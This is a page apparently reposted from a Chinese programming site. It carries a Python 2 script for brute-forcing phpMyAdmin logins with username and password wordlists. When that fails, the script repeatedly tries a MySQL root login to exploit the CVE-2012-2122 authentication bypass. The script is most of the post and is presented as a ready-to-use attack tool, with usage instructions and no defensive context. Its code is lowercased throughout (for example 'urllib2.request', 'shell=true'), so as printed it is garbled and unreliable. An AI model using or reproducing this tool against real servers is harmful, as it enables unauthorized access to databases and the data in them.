当前位置: 移动技术网 > IT编程>脚本编程>Python > Python写的PHPMyAdmin暴力破解工具代码

Python写的PHPMyAdmin暴力破解工具代码

2019年03月28日  | 移动技术网IT编程  | 我要评论

人流后多久可以吃水果,太原公交网,权力的游戏第六季第七集

phpmyadmin暴力破解,加上cve-2012-2122 mysql authentication bypass vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def crack(url,username,password):
	opener = urllib2.build_opener(urllib2.httpcookieprocessor(cookielib.lwpcookiejar())) 
	headers = {'user-agent' : 'mozilla/5.0 (windows nt 6.1; wow64)'}
	params = urllib.urlencode({'pma_username': username, 'pma_password': password})
	request = urllib2.request(url+"/index.php", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find('database server')!=-1 and a.find('name="login_form"')==-1:
		return username,password
	return 0
def mysqlauthenticationbypasscheck(host,port):
	i=0
	while i<300:
		i=i+1
		subprocess.popen("mysql --host=%s -p %s -uroot -piswin" % (host,port),shell=true).wait()
if __name__ == '__main__':
	if len(sys.argv)<4:
		print "#author:iswin\n#useage python pma.py //www.jb51.net/phpmyadmin/ username.txt password.txt"
		sys.exit()
	print "bruting,pleas wait..."
	for name in open(sys.argv[2],"r"):
		for passw in open(sys.argv[3],"r"):
			state=crack(sys.argv[1],name,passw)
			if state!=0:
				print "\nbrute successful"
				print "username: "+state[0]+"password: "+state[1]
				sys.exit()
	print "sorry,brute failed...,try to use mysqlauthenticationbypasscheck"
	choice=raw_input('warning:this function needs mysql environment.\ny:try to mysqlauthenticationbypasscheck\nothers:exit\n')
	if choice=='y' or choice=='y':
		host=raw_input('host:')
		port=raw_input('port:')
		mysqlauthenticationbypasscheck(host,port)

如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!! 点击进行留言回复

相关文章:

验证码:
移动技术网